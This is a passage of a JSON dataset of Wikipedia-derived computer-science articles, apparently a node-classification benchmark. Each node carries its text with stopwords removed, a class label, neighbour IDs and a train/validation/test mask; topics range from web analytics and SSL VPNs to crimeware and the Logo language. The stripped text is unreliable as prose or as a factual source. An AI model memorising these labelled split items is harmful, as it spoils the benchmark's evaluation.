file analysis presence caching desire able perform web analytics outsourced service led second data collection method page tagging 'web bugs mid-1990s web counters commonly seen — images included web page showed number times image requested estimate number visits page late 1990s concept evolved include small invisible image instead visible one using javascript pass along image request certain information page visitor information processed remotely web analytics company extensive statistics generated web analytics service also manages process assigning cookie user uniquely identify visit subsequent visits cookie acceptance rates vary significantly websites may affect quality data collected reported collecting website data using third-party data collection server even in-house data collection server requires additional dns lookup user computer determine ip address collection server occasion delays completing successful failed dns lookups may result data collected increasing popularity ajax-based solutions alternative use invisible image implement call back server rendered page case page rendered web browser piece ajax code would call back server pass information client aggregated web analytics company ways flawed browser restrictions servers contacted xmlhttprequest objects also method lead slightly lower reported traffic levels since visitor may stop page loading mid-response ajax call made logfile analysis programs page tagging solutions readily available companies wish perform web analytics cases web analytics company offer approaches question arises method company choose advantages disadvantages approach main advantages log file analysis page tagging follows main advantages page tagging log file analysis follows logfile analysis almost always performed in-house page tagging performed in-house often provided third-party service economic difference two models also consideration company deciding purchase solution cheaper implement depends amount technical expertise within company vendor chosen amount activity seen websites depth type information sought number distinct websites needing statistics regardless vendor solution data collection method employed cost web visitor analysis interpretation also included cost turning raw data actionable information use third party consultants hiring experienced web analyst training suitable in-house person cost-benefit analysis performed example revenue increase cost savings gained analyzing web visitor data companies produce solutions collect data log-files page tagging analyze kinds using hybrid method aim produce accurate statistics either method early hybrid solution produced 1998 rufus evison ip geolocation possible track visitors locations using ip geolocation database api visitors geolocated city region country level ip intelligence internet protocol ip intelligence technology maps internet categorizes ip addresses parameters geographic location country region state city postcode connection type internet service provider isp proxy information first generation ip intelligence referred geotargeting geolocation technology information used businesses online audience segmentation applications online advertising behavioral targeting content localization website localization digital rights management personalization online fraud detection localized search enhanced analytics global traffic management content distribution click analytics special type web analytics gives special attention clicks commonly click analytics focuses on-site analytics editor website uses click analytics determine performance particular site regards users site clicking also click analytics may happen real-time unreal -time depending type information sought typically front-page editors high-traffic news media sites want monitor pages real-time optimize content editors designers types stakeholders may analyze clicks wider time frame help assess performance writers design elements advertisements etc data clicks may gathered least two ways ideally click logged occurs method requires functionality picks relevant information event occurs alternatively one may institute assumption page view result click therefore log simulated click led page view customer lifecycle analytics visitor-centric approach measuring falls umbrella lifecycle marketing page views clicks events api calls access third-party services etc tied individual visitor instead stored separate data points customer lifecycle analytics attempts connect data points marketing funnel offer insights visitor behavior website optimization methods data collection sometimes used packet sniffing collects data sniffing network traffic passing web server outside world packet sniffing involves changes web pages web servers integrating web analytics web server software also possible methods claim provide better real-time data methods globally agreed definitions within web analytics industry bodies trying agree definitions useful definitive time main bodies input area iab interactive advertising bureau jicwebs joint industry committee web standards uk ireland daa digital analytics association formally known waa web analytics association us however many terms used consistent ways one major analytics tool another following list based conventions useful starting point off-site web analytics based open data analysis social media exploration share voice web properties usually used understand market site identifying keywords tagged site either social media websites using http referer webpage owners able trace referrer sites helps bring traffic site hotel problem generally first problem encountered user web analytics problem unique visitors day month add total unique visitors month appears inexperienced user problem whatever analytics software using fact simple property metric definitions way picture situation imagining hotel hotel two rooms room room b table shows hotel two unique users day three days sum totals respect days therefore six period room two unique users sum totals respect rooms therefore four actually three visitors hotel period problem person stays room two nights get counted twice count day counted looking total period software web analytics sum correctly chosen time period thus leading problem user tries compare totals historically vendors page-tagging analytics solutions used third-party cookies sent vendor domain instead domain website browsed third-party cookies handle visitors cross multiple unrelated domains within company site since cookie always handled vendor servers however third-party cookies principle allow tracking individual user across sites different companies allowing analytics vendor collate user activity sites provided personal information activity sites thought anonymous although web analytics companies deny companies companies supplying banner ads done privacy concerns cookies therefore led noticeable minority users block delete third-party cookies 2005 reports showed 28 internet users blocked third-party cookies 22 deleted least month vendors page tagging solutions moved provide least option using first-party cookies cookies assigned client subdomain another problem cookie deletion web analytics depend cookies identify unique visitors statistics dependent persistent cookie hold unique visitor id users delete cookies usually delete first- third-party cookies done interactions site user appear first-time visitor next interaction point without persistent unique visitor id conversions click-stream analysis metrics dependent activities unique visitor time accurate cookies used ip addresses always unique users may shared large groups proxies cases ip address combined user agent order accurately identify visitor cookies available however partially solves problem often users behind proxy server user agent methods uniquely identifying user technically challenging would limit trackable audience would considered suspicious cookies selected option reach lowest common denominator without using technologies regarded spyware may good aware third-party information gathering subject network limitations security applied countries service providers private networks prevent site visit data going third parties methods described methods mentioned like sampling central problem vulnerable manipulation inflation deflation means methods imprecise insecure reasonable model security issue addressed number papers to-date solutions suggested papers remain theoretical possibly due lack interest engineering community financial gain current situation provides owners big websites details consult aforementioned papers",
    "neighbors": [
      4096,
      1033,
      11274,
      10262,
      5150,
      7710,
      4640,
      3634,
      11319,
      3643,
      10814,
      2119,
      79,
      5203,
      5724,
      3688,
      113,
      10355,
      4725,
      8309,
      10370,
      9878,
      10392,
      11429,
      185,
      705,
      8914,
      10450,
      225,
      8941,
      8448,
      1794,
      1802,
      8470,
      4378,
      7965,
      7967,
      2340,
      4911,
      4917,
      9014,
      823,
      11578,
      3905,
      5442,
      2887,
      9036,
      845,
      2899,
      351,
      5472,
      7017,
      10604,
      896,
      3969,
      9601,
      6533,
      3462,
      7047,
      5513,
      10636,
      5524,
      1943,
      5536,
      3490,
      8623,
      2996,
      9656,
      444,
      8639,
      8644,
      8145,
      467,
      5607,
      4072,
      9708,
      6642,
      7669
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6577,
    "label": 5,
    "text": "Netgear_NSDP:netgear nsdp nsdp netgear switch discovery protocol management protocol several network device families designed netgear message body records tlv tag-length value structures type field may one following values table list incomplete network devices discovery mac-address device model discovery device firmware update made tftp protocol need send nsdp request turn tftp-server first",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      8386,
      7364,
      2887,
      8265,
      11210,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 6578,
    "label": 4,
    "text": "Abraham_Sinkov:abraham sinkov abraham abe sinkov august 22 1907 – january 19 1998 us cryptanalyst early employee u.s. army signals intelligence service held several leadership positions world war ii transitioning new national security agency war became deputy director retiring 1962 taught mathematics arizona state university sinkov son jewish immigrants russia born philadelphia grew brooklyn graduating boys high school took b.s mathematics city college new york coincidence one close friends boys high ccny solomon kullback mr. sinkov taught new york city schools unhappy working conditions anxious use mathematics knowledge practical ways opportunity career change came 1930 sinkov kullback took civil service examination placed high received mysterious letters washington asking knowledge foreign languages sinkov knew french kullback spanish acceptable prospective employer offered positions junior cryptanalysts although neither quite certain cryptanalyst accepted small signals intelligence service sis organization sinkov kullback third fourth employees primary mission compiling codes ciphers use u.s. army secondary task attempt solve selected foreign codes ciphers—this necessarily done intelligence purposes keep cryptanalysts abreast new developments field william friedman put new employees rigorous course study design cryptology bringing high levels skill making breaking codes ciphers friedman also encouraged self-improvement endeavors employees trained summers camp ft. meade earn commissions military reserves sinkov kullback also went receive doctorates mathematics sinkov received phd mathematics 1933 george washington university 1936 sinkov assigned panama canal zone established u.s. army first permanent intercept site outside continental united states sis grew slowly throughout early 1930s however successes japanese diplomatic codes using machine systems 1935 provided u.s. government critical information series crises success practical consequences sis well first time sis began garner respect military superiors military understood small organization could read sensitive messages potential adversary signal corps increased sis budget authorized increased hiring cryptanalysts 1940 even though united states officially combatant u.s. britain initiated exchanges technical material included cautious sharing cryptologic information british stages revealed extent considerable success high-level german systems u.s. equivalent success japanese led unprecedented level cooperation communication intelligence comint two countries war resulting personnel bigger budgets wider range activities organization january 1941 britain battled nazi germany nearly year united states entered second world war captain sinkov selected member delegation united kingdom initial sharing information two countries respective cryptologic programs delegation returned april mixed results report sinkov colleagues shown bletchley park secret headquarters british cryptology exchanged information german japanese systems still unclear much american delegation told british success german enigma machine sinkov later recalled told enigma problem short delegation leave details sketchy nevertheless mission uk success overall helped give us-uk cryptologic relations strong practical foundation japanese attack pearl harbor december 7 1941 japanese also attacked philippine islands general douglas macarthur ordered leave philippines re-establish u.s. army headquarters australia whence counterattacks might launched macarthur recognized need cryptologic support thus 15 april 1942 established central bureau cb cobbling together refugee elements american cryptologists evacuated philippines australian cryptologists allied contingents cb began melbourne moved brisbane july 1942 major sinkov arrived melbourne commander american detachment central bureau director cb paper general spencer b. akin macarthur chief signal officer general akin practice seldom visited organization worked sinkov washington panama confidently left cb operations control sinkov demonstrated strong organizational leadership qualities addition mathematics skills brought group americans australians—representing also different military services countries—into cohesive unit cb quickly became trusted producer signals intelligence sigint macarthur senior commanders sigint enabled consistent success air war japanese allowed macarthur win stunning victories ground campaign new guinea philippines war sinkov rejoined sis renamed army security agency 1949 armed forces security agency afsa —the first centralized cryptologic organization united states—was formed sinkov became chief communications security program remained position afsa made transition national security agency 1954 sinkov became second nsa official attend national war college first louis tordella upon return became deputy director production effectively swapping jobs old colleague frank rowlett sinkov retired nsa 1962 1966 wrote elementary cryptanalysis mathematical approach one first books subject directed high school students available general public abraham sinkov lived retirement arizona two careers 32 years nsa predecessors followed appointment professor mathematics arizona state university colonel sinkov member military intelligence hall fame",
    "neighbors": [
      4007,
      6572,
      3629,
      7887,
      9617,
      1941,
      1783,
      6749,
      5310
    ],
    "mask": "None"
  },
  {
    "node_id": 6579,
    "label": 4,
    "text": "SSL-Explorer:_Community_Edition:ssl-explorer community edition ssl-explorer community edition open-source ssl vpn product developed 3sp ltd company acquired barracuda networks licensed gnu general public license gpl aimed primarily smaller businesses need remote access internal network resources product designed installed standalone server allows user connect remotely internal corporate resources intranet websites network file shares ‘ fat client ’ applications data via regular web browser gives end users access applications would use every day work simple web browser without necessity installing dedicated vpn client software product first released sourceforge.net website august 2004 since 275,000 downloads main product distribution december 2007 versions core community edition product licensed gpl commercial enterprise edition product built upon community edition additional functionality licensed separately commercial license fork last gpl release created named adito later renamed openvpn als around march 2008 3sp ltd announced discontinued development community edition ssl-explorer known install function following operating systems product previously licensed gpl source code still available via sourceforge.net however future updates source code pre-built binaries forthcoming 3sp ltd. november 18 2008 3sp ltd. part barracuda networks technology behind ssl-explorer incorporated barracuda ssl vpn ssl-explorer application written java contains database web server used serve secure web pages order access back-end network resources product ideally installed upon standalone server may installed service run background processes desired product acts web-based proxy mediates requests resources external users also providing means authenticating users identities querying number user databases including microsoft active directory access rights enforced principle role based access control secondary access control measures ntfs filesystem permissions also affect resources user may access resources e.g remote desktop access require use port forwarding operate successfully purpose lightweight java applet known 'ssl-explorer agent downloaded launched client browser applet intercepts tcp/ip requests certain configurable ports forwards ssl-explorer server turn routes appropriate endpoint network using combination various techniques web proxying port forwarding corporate applications continue function unimpeded data tunneled transparently end point client via ssl-explorer using https protocol network resources may externalized ssl-explorer include following actual vpn server may placed inside either dmz within trusted network incoming connections port 443 forwarded directly ssl-explorer firewall rules one main advantages associated ssl vpn products lies fact correctly set technically possible close firewall ports apart https/ssl port 443 often lumped together similar solutions ssl-explorer conceptually different openvpn provides controlled authenticated access services applications within network rather full unchallenged network access ssl-explorer ssl vpn products whole beneficial many people number distinct groups benefit greatly usage community edition ssl-explorer provided number security features features one-time-password support hardware token authentication offered via commercial implementation barracuda ssl vpn february 2007 3sp ltd conducted performance benchmarking ssl-explorer solution using test bed platform three systems using different specifications hardware benchmarking conducted assumption minimum 256 kbit/s data throughput rate would realistic value place upon responsive vpn tunnel use remote desktop access bea jrockit jre used tests microsoft windows linux systems results obtained indicated ssl-explorer known operate successfully using ncipher nfast ln1200 ssl accelerator card ssl-explorer built using number open source software components frameworks notable projects summarized june 2007 secunia published advisory stating versions ssl-explorer prior 0.2.13 vulnerable cross-site scripting attacks http header injection attacks 3sp ltd fixed vulnerability later versions product advised users upgrade servers currently us-cert advisory notice unresolved potential security flaw affecting whole class url-rewriting clientless ssl vpn products including versions ssl-explorer derivatives many similar utilities see",
    "neighbors": [
      899,
      1164,
      6797,
      2193,
      929,
      10149,
      8998,
      5677,
      7983,
      2228,
      823,
      2872,
      5433,
      1474,
      7364,
      3791,
      3545,
      5491,
      4725,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 6580,
    "label": 1,
    "text": "Plants_of_the_World_Online:plants world online plants world online online database published royal botanic gardens kew launched march 2017 ultimate aim enable users access information world known seed-bearing plants 2020 initial focus tropical african floras particularly flora zambesiaca flora west tropical africa flora tropical east africa",
    "neighbors": [
      560,
      10513,
      1227,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 6581,
    "label": 9,
    "text": "JetBrains_MPS:jetbrains mps jetbrains mps metaprogramming system developed jetbrains mps tool design domain-specific languages dsl uses projectional editing allows users overcome limits language parsers build dsl editors ones tables diagrams. br implements language-oriented programming mps environment language definition language workbench integrated development environment ide languages developers different domains benefit domain specific language extensions general purpose programming languages example java developers working financial applications might benefit built-in support monetary values unfortunately traditional text based languages subject text ambiguity problems makes extensions problematic mps supports composable language definitions means languages extended embedded extensions used work program mps example java extended better syntax collections extended better syntax dates extensions work well together mps solves grammar ambiguity issues working abstract syntax tree directly order edit tree text-like projectional editor used mps provides reusable language infrastructure configured language definition languages mps also provides many ide services automatically editor code completion find usages etc mbeddr embedded development system based mps languages tailored embedded development formal methods october 2009 jetbrains released youtrack bug tracking system first commercial software product developed mps april 2010 realaxy actionscript editor beta released first commercial ide based mps platform peopl tool software product line engineering realised mps mps source code released apache license",
    "neighbors": [
      7777,
      9926,
      2537,
      5612,
      5677,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 6582,
    "label": 3,
    "text": "Mach_3_(1987_video_game):mach 3 1987 video game mach 3 1987 3d shooter video game loriciels amiga amstrad cpc atari st msx thomson to7 zx spectrum ibm pc pc version uses cga 320x200 video mode player controls spacecraft shoots various enemy crafts avoiding mines obstacles intro screen sampled phrase spoken get ready mach 3",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 6583,
    "label": 2,
    "text": "Slackpkg:slackpkg slackpkg software tool installing upgrading packages automatically network internet slackware slackpkg included main tree slackware 12.2 previously included extras/ since slackware 9.1 licensed gnu general public license gpl slackpkg automated package management tool written slackware shell script like swaret designed make slackware system administrator job easier allowing routine package management tasks accomplished single command slackpkg replace slackware package management tools installpkg upgradepkg rather uses features slackpkg include automated package installation upgrading searching many features package deinstallation performed directly using slackware package tools though incorporation slackpkg provides consistent user interface slackpkg resolve dependencies packages like rpm fedora opensuse third-party applications slapt-get automated package relation management",
    "neighbors": [
      11525,
      2310,
      10760,
      7689,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      657,
      10387,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      7325,
      10149,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      2872,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      10062,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      9063,
      9324,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      7293,
      6910
    ],
    "mask": "Train"
  },
  {
    "node_id": 6584,
    "label": 2,
    "text": "Common_Log_File_System:common log file system common log file system clfs general-purpose logging subsystem accessible kernel-mode well user-mode applications building high-performance transaction logs introduced windows server 2003 r2 included later windows operating systems clfs used data logging well event logging clfs used txf txr store transactional state changes commit transaction binary log file created clfs viewed integrated windows tool job clfs like transactional logging system record series steps required action either played back accurately future commit transaction secondary storage undone required clfs first marshals logs records in-memory buffers writes log-files secondary storage stable media clfs terminology permanent persistence data flushed stable media controlled built-in policies clfs client application override force flush clfs allows customizable log formats expansion truncation logs according defined policies well simultaneous use multiple client applications clfs able store log files anywhere file system clfs defines device driver interface ddi via physical storage system specific drivers plug clfs api clfs driver implements aries recovery algorithm algorithms supported using custom drivers clfs supports dedicated logs well multiplexed logs dedicated log contains single stream log records whereas multiplexed log contain multiple streams stream different application even though multiplexed log multiple streams logs flushed streams sequentially single batch clfs allocate space set log records ahead-of-time logs actually generated make sure operation fail due lack storage space log record clfs stream first placed log i/o block buffer system memory periodically blocks flushed stable storage devices storage device log contains set containers allocated contiguously containing multiple log i/o blocks new log records appended present set record identified log sequence number lsn increasing 32-bit sequence number lsn metadata stored record header lsn encodes identifier container offset record identifier record information used access log record subsequently however container identifiers logical identifiers must mapped physical containers mapping done clfs",
    "neighbors": [
      10243,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      1577,
      10281,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      1348,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      4074,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 6585,
    "label": 8,
    "text": "Open_Mashup_Alliance:open mashup alliance open mashup alliance oma non-profit consortium promotes adoption mashup solutions enterprise evolution enterprise mashup standards like emml enterprise mashup usage expected grow tenfold next five years initial members oma include large technology companies adobe systems hewlett-packard intel major technology users bank america capgemini according information technology industry analyst dion hinchcliffe ultimately oma creates standardized approach enterprise mashups creates open vibrant market competing runtimes mashups array important aftermarket services development/testing tools management administration appliances governance frameworks education professional services initial focus oma developing emml declarative mashup domain-specific language dsl aimed creating enterprise mashups emml language provides comprehensive set high-level mashup-domain vocabulary consume mash variety web data-sources diverse ways emml provides uniform syntax invoke heterogeneous service styles rest wsdl rss/atom rdbms pojo emml also provides ability mix match diverse data-formats xml json jdbc javaobjects primitive types oma web site provides emml specification emml schema reference runtime implementation capable running emml scripts sample emml mashup scripts technical documentation oma developing emml creative commons attribution derivatives license license means emml users allowed copy distribute emml however emml altered users ownership emml oma must made clear redistribution eventual objective oma submit emml specification oma specifications recognized industry standards body",
    "neighbors": [
      5384,
      4107,
      9926,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6586,
    "label": 4,
    "text": "Network_Admission_Control:network admission control network admission control nac refers cisco version network access control restricts access network based identity security posture network device switch router wireless access point dhcp server etc configured nac force user machine authentication prior granting access network addition guest access granted quarantine area remediation problems may caused authentication failure enforced inline custom network device changes existing switch router restricted dhcp class typical non-free wifi connection form nac user must present sort credentials credit card granted access network initial phase cisco network admission control nac functionality enables cisco routers enforce access privileges endpoint attempts connect network access decision basis information endpoint device current antivirus state antivirus state includes information version antivirus software virus definitions version scan engine network admission control systems allow noncompliant devices denied access placed quarantined area given restricted access computing resources thus keeping insecure nodes infecting network key component cisco network admission control program cisco trust agent resides endpoint system communicates cisco routers network cisco trust agent collects security state information antivirus software used communicates information cisco routers information relayed cisco secure access control server acs access control decisions made acs directs cisco router perform enforcement endpoint cisco product marked end life since november 30 2011 cisco terminology product longer developed supported besides user authentication authorization nac based upon compliance checking posture assessment evaluation system security based applications settings particular system using might include windows registry settings presence security agents anti-virus personal firewall nac products differ checking mechanisms nac vendors require 802.1x supplicant client agent installed including hexis netbeat nac trustwave enterasys offer agent-less posture checking designed handle bring device byod scenario agent-less approach works heterogenously across almost network environments network device types",
    "neighbors": [
      9442,
      2084,
      3944,
      11434,
      6797,
      2737,
      5490,
      8753,
      2356,
      6904
    ],
    "mask": "None"
  },
  {
    "node_id": 6587,
    "label": 2,
    "text": "Dreamshell:dreamshell dreamshell unix-like operating system designed sega dreamcast video game console based kallistios libraries originally command line interface ability run third-party applications later versions dreamshell gained gui xml-module support applications written lua-scripts ability enhance functionality using functions klf-modules analogous dll kallisti os fixed modules mp3 ogg loaded console commands appear play formats well support implemented file manager internal external commands added facilitate ds kernel first application appeared dreamshell version 4.0 allows install operating system directly dreamcast bios lets change console regional setting video output format pal ntsc without flashing bios application relies consoles modified motherboard",
    "neighbors": [
      4777,
      1515,
      237,
      7151,
      7983,
      4561,
      9840,
      5397,
      252,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6588,
    "label": 4,
    "text": "Crimeware:crimeware crimeware class malware designed specifically automate cybercrime crimeware distinct spyware adware designed perpetrate identity theft social engineering technical stealth order access computer user financial retail accounts purpose taking funds accounts completing unauthorized transactions enrich cyberthief alternatively crimeware may steal confidential sensitive corporate information crimeware represents growing problem network security many malicious code threats seek pilfer confidential information term crimeware coined david jevans february 2005 anti-phishing working group response fdic article putting end account-hijacking identity theft published december 14 2004 criminals use variety techniques steal confidential data crimeware including following methods crimeware threats installed victims computers multiple delivery vectors including crimeware significant economic impact due loss sensitive proprietary information associated financial losses one survey estimates 2005 organizations lost excess 30 million due theft proprietary information theft financial confidential information corporate networks often places organizations violation government industry-imposed regulatory requirements attempt ensure financial personal confidential us laws regulations include",
    "neighbors": [
      3072,
      6786,
      5636,
      5764,
      7044,
      10245,
      10756,
      9227,
      9356,
      9102,
      3473,
      7441,
      4863,
      4883,
      1429,
      278,
      4245,
      8471,
      7449,
      1690,
      3867,
      5404,
      9242,
      10141,
      10392,
      5281,
      9761,
      5284,
      2213,
      8998,
      9256,
      2857,
      939,
      300,
      9771,
      7855,
      1970,
      9909,
      4023,
      10297,
      3643,
      7739,
      9791,
      1088,
      3395,
      8387,
      3525,
      4165,
      2508,
      4813,
      3032,
      3290,
      4314,
      4956,
      7515,
      4344,
      2275,
      3555,
      3941,
      9187,
      11621,
      107,
      877,
      8978,
      9233,
      9591,
      3320,
      2041,
      7547,
      5245,
      2558,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 6589,
    "label": 9,
    "text": "Java_APIs_for_Bluetooth:java apis bluetooth java apis bluetooth wireless technology jabwt j2me specification apis allows java midlets running embedded devices mobile phones use bluetooth short-range wireless communication jabwt developed jsr-82 java community process jsr 82 implementations java 2 platform standard edition j2se also available original java specification request jsr-82 submitted motorola sun microsystems approved executive committee j2me september 2000 jsr-82 provided first standardized java api bluetooth protocols allowing developers write applications using bluetooth work devices conforming specification first version jsr-82 released march 2002 recent update jsr-82 maintenance draft review 4 released march 2010 specification reference implementation technology compatibility kit tck maintained motorola open source jabwt provides support discovery nearby bluetooth devices java applications use api scan discoverable devices identify services provided discovered devices search devices device frequently contacts jabwt provides object exchange api transfer data objects devices example two devices conforming obex protocol could exchange virtual business cards calendar appointments jabwt allows management local device ’ state jabwt applications able access information host device bluetooth address mark host device discoverable bluetooth devices register provide services jabwt supports connections different levels security applications using apis pass parameters connector.open method indicating level security required establish connection another device hundreds mobile devices different manufacturers comply jsr-82 specification google maintains list devices conform jsr-82 specification several open-source implementations jsr-82 specification available",
    "neighbors": [
      4960,
      9665,
      3561,
      5677,
      9011
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6590,
    "label": 5,
    "text": "SDES:sdes sdes session description protocol security descriptions media streams way negotiate key secure real-time transport protocol proposed standardization ietf july 2006 see rfc 4568 keys transported sdp attachment sip message means sip transport layer must make sure no-one else see attachment done using tls transport layer methods like s/mime using tls assumes next hop sip proxy chain trusted take care security requirements request main advantage method extremely simple key exchange method picked several vendors already even though vendors use secure mechanism transport key helps get critical mass implementation make method de facto standard illustrate principle example phone sends call proxy using sips scheme indicates call must made secure key base-64 encoded sdp attachment phone receives answer proxy two-way secure call common problem secure media key exchange might finished first media packet arrives order avoid initial clicks packets must dropped usually short period time 100 ms major problem sdes method address end-to-end media encryption example user talking user b via proxy p sdes allows negotiation keys p b p b end-to-end media security must first establish trust relationship side use trusted intermediate call setup delay significantly increase makes applications like push-to-talk difficult peer-to-peer might difficult identify side example operator might implement b2bua architecture play role side still n't end-to-end security newer modern protocols like zrtp offer end-to-end encryption sip/rtp calls",
    "neighbors": [
      10269,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 6591,
    "label": 6,
    "text": "Moose_File_System:moose file system moose file system moosefs open-source posix-compliant distributed file system developed core technology moosefs aims fault-tolerant highly available highly performing scalable general-purpose network distributed file system data centers initially proprietary software released public open source may 30 2008 currently two editions moosefs available moosefs follows similar design principles fossil file system google file system lustre ceph file system comprises three components achieve high reliability performance moosefs offers following features similarly cluster-based file systems moosefs uses commodity hardware running posix compliant operating system tcp/ip used interconnect",
    "neighbors": [
      3328,
      2051,
      2314,
      6291,
      1049,
      6049,
      7983,
      5170,
      823,
      5433,
      3909,
      7368,
      6993,
      3795,
      11221,
      728,
      3931,
      2395,
      11638,
      3450,
      3582,
      10111
    ],
    "mask": "None"
  },
  {
    "node_id": 6592,
    "label": 4,
    "text": "Central_Equipment_Identity_Register:central equipment identity register central equipment identity register database imei numbers blacklisted handsets device esn imei number listed ceir supposed work member service providers networks paying members may access database number features added ceir like providing statistics number handset types growth/decline per network reported daily weekly monthly yearly base also see msisdn imsi used imei search imei used imsi common usage ceir stolen mobile devices user reports operator theft mobile devices imei number entered ceir supposedly making device unusable network although always work key reason sometimes work many operators many countries contribute imeis ceir also unique profile determines operators blocks included ceir updates received operator uk networks example receive block records originated non-uk networks annual fees required access ceir access tightly regulated contributing operators decide handsets block networks many network operators simply participate blocking users means losing revenue operators often trade business ethics revenue one operator country block use stolen handsets revenue flows operator instead ethical ones currently central equipment identity register frequently called imei db database system means central system network operators eir share individual blacklists one another service denied particular devices appear blacklist idea network operators compile one global blacklist imei db however agreement single ceir equipment identity register reduces threats theft mobile devices enabling individual operators prevent use stolen mobile devices networks improves users security switching stolen mobile devices making useless bricked mobile devices thieves thus less likely stolen first place number mobile devices messaging users continue grow become target fraudulent criminal activities mobile messaging application infrastructure companies nokia mavenir comviva primal technologies svyazcom tekelec examples providers equipment identity worldwide mobile operators like vodafone airwide mts svyazcom 4gtss cegetel tekelec deploy lists ceirs tra mandatory rule use ceir operator network prevent handset theft cloning dual sim cards imei:358251074242576",
    "neighbors": [
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 6593,
    "label": 4,
    "text": "Protection_Profile:protection profile protection profile pp document used part certification process according iso/iec 15408 common criteria cc generic form security target st typically created user user community provides implementation independent specification information assurance security requirements pp combination threats security objectives assumptions security functional requirements sfrs security assurance requirements sars rationales pp specifies generic security evaluation criteria substantiate vendors claims given family information system products among others typically specifies evaluation assurance level eal number 1 7 indicating depth rigor security evaluation usually form supporting documentation testing product meets security requirements specified pp national institute standards technology nist national security agency nsa agreed cooperate development validated u.s. government pps pp states security problem rigorously given collection system products known target evaluation toe specify security requirements address problem without dictating requirements implemented pp may inherit requirements one pps order get product evaluated certified according cc product vendor define security target st may comply one pps way pp may serve template product st although eal easiest laymen compare simplicity deceptive number rather meaningless without understanding security implications pp st used evaluation technically comparing evaluated products requires assessing eal functional requirements unfortunately interpreting security implications pp intended application requires strong security expertise evaluating product one thing deciding product cc evaluation adequate particular application quite another obvious trusted agency possesses depth security expertise needed evaluate systems applicability common criteria evaluated products problem applying evaluations new problem addressed decades ago massive research project defined software features could protect information evaluated strength mapped security features needed specific operating environment risks results documented rainbow series rather separating eal functional requirements orange book followed less advanced approach defining functional protection capabilities appropriate assurance requirements single category seven categories defined way yellow book defined matrix security environments assessed risk established precisely security environment valid orange book categories approach produced unambiguous layman cookbook determine whether product usable particular application loss application technology seems unintended consequence superseding orange book common criteria",
    "neighbors": [
      1350,
      8904,
      5865,
      7979,
      6604,
      4303,
      5136,
      1905,
      1010,
      10962,
      7354,
      4253
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6594,
    "label": 9,
    "text": "Logo_(programming_language):logo programming language logo educational programming language designed 1967 wally feurzeig seymour papert cynthia solomon logo acronym name coined feurzeig bolt beranek newman derives greek logos meaning word thought general-purpose language logo widely known use turtle graphics commands movement drawing produced line vector graphics either screen small robot termed turtle language conceived teach concepts programming related lisp later enable papert called body-syntonic reasoning students could understand predict reason turtle motion imagining would turtle substantial differences among many dialects logo situation confused regular appearance turtle graphics programs named logo logo multi-paradigm adaptation dialect lisp functional programming language standard logo ucblogo best facilities handling lists files i/o recursion scripts used teach computer science concepts uc berkeley lecturer brian harvey computer science logo style trilogy logo usually interpreted language although developed compiled logo dialects lhogho liogo logo case-sensitive retains case used formatting logo created 1967 bolt beranek newman bbn cambridge massachusetts research firm wally feurzeig cynthia solomon seymour papert intellectual roots artificial intelligence mathematical logic developmental psychology first four years logo research development teaching work done bbn first implementation logo called ghost written lisp pdp-1 goal create mathematical land children could play words sentences modeled lisp design goals logo included accessible power informative error messages use virtual turtles allowed immediate visual feedback debugging 